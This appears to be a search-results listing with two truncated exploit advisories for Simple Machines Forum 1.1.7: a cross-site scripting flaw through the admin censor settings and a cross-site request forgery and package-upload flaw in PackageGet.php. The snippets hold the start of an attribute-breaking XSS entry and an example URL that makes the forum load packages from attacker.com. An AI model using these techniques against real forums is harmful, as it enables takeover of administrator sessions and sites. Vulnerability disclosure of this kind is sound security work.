2 matches found
SMF 1.1.7 Cross Site Scripting
SMF 1.1.7 simplemachines.org XSS Exploitation: If you can modify the censor on a SMF forum, then you can make it execute arbitrary JS code. http://SMF.Forum.com/index.php?action=postsettings;sa=censor Just add the following entry: http://www.test.xss/ = http://www.test-xss/"...
Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload
Author: Xianur0 Vulnerable Version: All The Bug is located in the file: Sources/PackageGet.php Example: http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com When the admin link between the SMF to load the file: http://attacker.com/packages.xml Save this file as...